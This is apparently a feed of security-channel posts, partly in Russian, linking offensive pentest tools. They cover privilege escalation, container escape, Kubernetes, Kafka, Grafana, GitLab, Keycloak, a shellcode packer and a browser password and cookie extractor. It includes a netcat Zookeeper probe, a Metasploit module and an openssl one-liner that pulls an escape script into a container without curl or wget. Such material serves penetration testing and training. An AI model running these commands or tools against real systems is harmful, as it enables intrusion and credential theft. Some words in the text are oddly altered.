Windows Local Privilege Escalation Cookbook
Tactics & Techniques for windows privileges escalation with explanations, examples and labs for each case
Link
Tactics & Techniques for windows privileges escalation with explanations, examples and labs for each case
Link
GitHub
GitHub - nickvourd/Windows-Local-Privilege-Escalation-Cookbook: Windows Local Privilege Escalation Cookbook
Windows Local Privilege Escalation Cookbook. Contribute to nickvourd/Windows-Local-Privilege-Escalation-Cookbook development by creating an account on GitHub.
❤3
A collection of manifests that create pods with different elevated privileges.
Quickly demonstrate the impact of allowing security sensitive pod attributes like
#kubernetes
Quickly demonstrate the impact of allowing security sensitive pod attributes like
* hostNetwork
* hostPID
* hostPath
* hostIPC
* privileged
#kubernetes
GitHub
GitHub - BishopFox/badPods: A collection of manifests that will create pods with elevated privileges.
A collection of manifests that will create pods with elevated privileges. - BishopFox/badPods
❤3
pspy - unprivileged Linux process snooping
It allows you to see commands run by other users, cron jobs, etc. as they execute.
The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.
Link
It allows you to see commands run by other users, cron jobs, etc. as they execute.
The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.
Also great to demonstrate why passing secrets as arguments on the command line is a bad idea.
Link
GitHub
GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions
Monitor linux processes without root permissions. Contribute to DominicBreuker/pspy development by creating an account on GitHub.
❤3🐳1
Инструменты для изучения безопасности kubernetes
Обзор на simulator - Link
#kubernetes
* simulator (with AWS)
* kube_security_lab (On-premise)
Обзор на simulator - Link
#kubernetes
GitHub
GitHub - controlplaneio/simulator: Kubernetes Security Training Platform - focusing on security mitigation
Kubernetes Security Training Platform - focusing on security mitigation - controlplaneio/simulator
❤4
Multi Tool Kubernetes Pentest Image
This docker image by Luntry contains all the most popular and necessary tools for Kubernetes penetration testing
Inside:
#kubernetes
This docker image by Luntry contains all the most popular and necessary tools for Kubernetes penetration testing
Inside:
* Shell via web
* common tools for kube pentest
* Bypass read-only container file system
* Bypass signature engine
#kubernetes
GitHub
GitHub - r0binak/MTKPI: 🧰 Multi Tool Kubernetes Pentest Image
🧰 Multi Tool Kubernetes Pentest Image . Contribute to r0binak/MTKPI development by creating an account on GitHub.
❤3
Multi-Cloud tools
Инструменты для тестирования облачных сред
Представление инфраструктурных объектов и связей между ними в виде графа Neo4j
Дополнительный список cloud-sec инструментов - Link
Инструменты для тестирования облачных сред
* PurplePanda - поиск миссконфигов и privesc. Cloud/SaaS
* Prowler - проведение аудитов, реагирование на инциденты и многое другое в таких средах, как AWS, Azure, GCP и Kubernetes
* CloudSploit by Aqua - Cloud Security Scans
* ScoutSuite - Multi-Cloud Security Auditing Tool
Представление инфраструктурных объектов и связей между ними в виде графа Neo4j
* cartography
* starbase
* IceKube
* KubeHound
Дополнительный список cloud-sec инструментов - Link
🤯2
❤3
Kafka pentest
Common notes - Link
Kafka UI RCE - Link
Misconfigurations & Hardening - Link
Zookeeper
Работает на TCP 2181 и по умолчанию доступен без аутентификации. Позволяет получить статистику о кластере, информацию об узлах, выключить сервер и т.д
Все команды:
Отправить команду:
Metasploit Module - Link
Common notes - Link
Kafka UI RCE - Link
Misconfigurations & Hardening - Link
Zookeeper
Работает на TCP 2181 и по умолчанию доступен без аутентификации. Позволяет получить статистику о кластере, информацию об узлах, выключить сервер и т.д
Все команды:
dump: Lists the outstanding sessions and ephemeral nodes. This only works on the leader.
envi: Print details about serving environment
kill: Shuts down the server. This must be issued from the machine the ZooKeeper server is running on
reqs: List outstanding requests
ruok: Tests if server is running in a non-error state. The server will respond with imok if it is running. Otherwise it will not respond at all
srst: Reset statistics returned by stat command
stat: Lists statistics about performance and connected clients
Отправить команду:
echo urok | nc 192.168.1.1 2181
Metasploit Module - Link
msf > use auxiliary/gather/zookeeper_info_disclosure
Bugb
9092 - Pentesting Kafka
Getting startedKafka is an open-source distributed event streaming platform that is commonly used for building real-time data pipelines and streaming applications. It is designed to handle high-throughput, fault-tolerant, and scalable data streaming. Below…
❤3🤯2🐳1
Grafana pentest
Известно, что с помощью уже созданных data sources можно получить доступ к ресурсам, к которым ходит графана
Примеры:
Grafana Remote Command Execution Through SQL Server
SQL Injection by Default in Grafana (HTB — Jupiter)
Но так же можно создать свой собственный data source и отправлять запросы от лица графаны, с помощью api метода proxy - https://spells.cr4.sh/pentest/infra/cloud-and-linux/grafana
Известно, что с помощью уже созданных data sources можно получить доступ к ресурсам, к которым ходит графана
Примеры:
Grafana Remote Command Execution Through SQL Server
SQL Injection by Default in Grafana (HTB — Jupiter)
Но так же можно создать свой собственный data source и отправлять запросы от лица графаны, с помощью api метода proxy - https://spells.cr4.sh/pentest/infra/cloud-and-linux/grafana
Medium
Grafana Remote Command Execution Through Microsoft SQL Server
Today I was conducting internal penetration testing for a mid-size company when I came across a Grafana(v10) instance with default admin…
❤8🐳3
Gitlab checks
* Reconnaissance - Link
* Abusing GitLab Runners - Link
* Script for steal tasks by requesting them faster than a real runner - Link
GitHub
GitHub - Frichetten/gitlab-runner-research: Research on abusing GitLab Runners
Research on abusing GitLab Runners. Contribute to Frichetten/gitlab-runner-research development by creating an account on GitHub.
❤1
Docker Escape
Tools
articles
7 Ways to Escape a Container - Обзор 7 распространенных техник побега из контейнера, их минимальных требований к capabilities и примеры уязвимых конфигураций контейнеров
All You Need is Cap - Похожий ресерч, также содержит примеры уязвимых конфигураций контейнеров внутри подов
Tools
* deepce - noscript for Enumeration, Escalation of Privileges and Container Escapes written in pure sh
* CDK - K8s, Docker penetration toolkit
* botb - analysis and exploitation tool also being CI/CD friendly with common CI/CD technologies
* amicontained - Useful tool to get the privileges the container has in order to find ways to escape from it
* grype - Get the CVEs contained in the software installed in the image
* linpeas - It can also enumerate containers
articles
7 Ways to Escape a Container - Обзор 7 распространенных техник побега из контейнера, их минимальных требований к capabilities и примеры уязвимых конфигураций контейнеров
All You Need is Cap - Похожий ресерч, также содержит примеры уязвимых конфигураций контейнеров внутри подов
GitHub
GitHub - stealthcopter/deepce: Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)
Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE) - stealthcopter/deepce
❤4🐳1
Bring file to container without curl/wget etc
you can send http requests using OpenSSL
Download deepce
Download from inside a container using only bash
Corrected noscript to work properly with python server - Link
you can send http requests using OpenSSL
Download deepce
(echo -ne "GET /stealthcopter/deepce/main/deepce.sh HTTP/1.1\r\nHost: raw.githubusercontent.com\r\nConnection: close\r\n\r\n"; sleep 3) | openssl s_client -connect raw.githubusercontent.com:443 -quiet > deepce.sh
Download from inside a container using only bash
Corrected noscript to work properly with python server - Link
cd /tmp
tee -a getFile.sh
<copy+paste the contents of the getFile.sh noscript>
<hit enter and the ctrl-d/cmd-d>
cat getFile.sh
URL=http://localhost:8000/file OUTPUT=file ./get.sh
Medium
Download from inside a container using only bash
without curl or wget
❤5🐳1
Nginxpwner - is a simple tool to look for common Nginx misconfigurations and vulnerabilities
Install using Docker
It actually checks for
Install using Docker
git clone https://github.com/stark0de/nginxpwner
cd nginxpwner
sudo docker build -t nginxpwner:latest .
sudo docker run -it nginxpwner:latest /bin/bash
It actually checks for
* Gets Ngnix version and gets its possible exploits using searchsploit and tells if it is outdated
* Throws a wordlist specific to Nginx via gobuster
* Checks if it is vulnerable to CRLF via a common misconfiguration of using $uri in redirects
* Checks for CRLF in all of the paths provided
* Checks if the PURGE HTTP method is available from the outside
* Checks for variable leakage misconfiguration
etc
❤2🐳1
darkPulse
darkPulse is a shellcode packer written in Go that is used to create various shellcode loaders
darkPulse is a shellcode packer written in Go that is used to create various shellcode loaders
❤4🐳1
Netfetch
Scan your Kubernetes clusters to identifiy unprotected workloads and map your existing Network policies
Link
Scan your Kubernetes clusters to identifiy unprotected workloads and map your existing Network policies
* Visualize network policies and pods in a interactive network map
* Scan cluster identify pods without network policies
* Create default deny network policies where this is missing
* Get suggestions for network policies based on existing workloads
Link
❤4🐳1
SCCMHunter
SCCMHunter is a post-ex tool built to streamline identifying, profiling, and attacking SCCM related assets in an Active Directory domain
contains modules such as
Link
SCCMHunter is a post-ex tool built to streamline identifying, profiling, and attacking SCCM related assets in an Active Directory domain
contains modules such as
* admin
* dpapi
* http
* mssql
* smb
Link
GitHub
GitHub - garrettfoster13/sccmhunter: SCCMHunter is a post-ex tool built to streamline identifying, profiling, and attacking SCCM…
SCCMHunter is a post-ex tool built to streamline identifying, profiling, and attacking SCCM related assets in an Active Directory domain. - GitHub - garrettfoster13/sccmhunter: SCCMHunter is a pos...
🤯2❤1
Keycloak pentest
Articles
Part 1 - Link
Part2 - Link
Tools
Keycloak security scanner - Link
* Начиная с keycloak 17.0+ роут /auth в URL должен быть пропущен (
Articles
Part 1 - Link
* Am I Testing Keycloak?
* Keycloak Version Information
* OpenID Configuration /SAML Denoscriptor
* Realms (Enumeration && Self-Registration Enabled)
* Client IDs
* Scopes
* Grants
* Identity Providers
* Roles
* User Email Enumeration
Part2 - Link
Reconnaissance
* Additional Services and Ports
* Interesting Local Files
* Reconnaissance Conclusion
Exploitation
* Brute Force Login
* Bypassing/Automating CSRF
* JWT Signing Algorithms
* Make the most out of your scopes/roles
* offline_access
* uma_authorization
* profile
* address
* phone
Tools
Keycloak security scanner - Link
* Начиная с keycloak 17.0+ роут /auth в URL должен быть пропущен (
/realms/realm_name/)Csacyber
Pentesting Keycloak Part 1: Identifying Misconfiguration Using Risk Management Tools
Keycloak is an open-source Identity and Access Management (IAM) solution. It allows easy implementation of single sign-on for web applications and APIs.
❤5🤯2🐳2
HackBrowserData is a command-line tool for decrypting and exporting browser data
It supports the most popular browsers on the market and runs on Windows, macOS and Linux
Link
* passwords
* history
* cookies
* bookmarks
* download history
* localStorage
* extensions
It supports the most popular browsers on the market and runs on Windows, macOS and Linux
Link
GitHub
GitHub - moonD4rk/HackBrowserData: Extract and decrypt browser data, supporting multiple data types, runnable on various operating…
Extract and decrypt browser data, supporting multiple data types, runnable on various operating systems (macOS, Windows, Linux). - moonD4rk/HackBrowserData
❤3🐳2